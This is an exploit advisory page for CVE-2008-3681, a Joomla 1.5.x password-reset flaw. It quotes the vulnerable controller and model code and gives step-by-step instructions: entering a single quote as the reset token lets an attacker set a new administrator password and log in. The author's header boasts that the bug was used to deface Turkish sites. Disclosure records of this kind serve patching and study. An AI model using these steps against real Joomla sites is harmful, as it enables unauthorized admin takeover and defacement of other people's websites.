Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Published
Credit
Risk
2008.08.17
d3m0n
High
CWE
CVE
Local
Remote
CWE-264
CVE-2008-3681
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}

// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

References:

http://www.securitytracker.com/id?1020687
http://www.securityfocus.com/bid/30667
http://www.milw0rm.com/exploits/6234
http://secunia.com/advisories/31457
http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com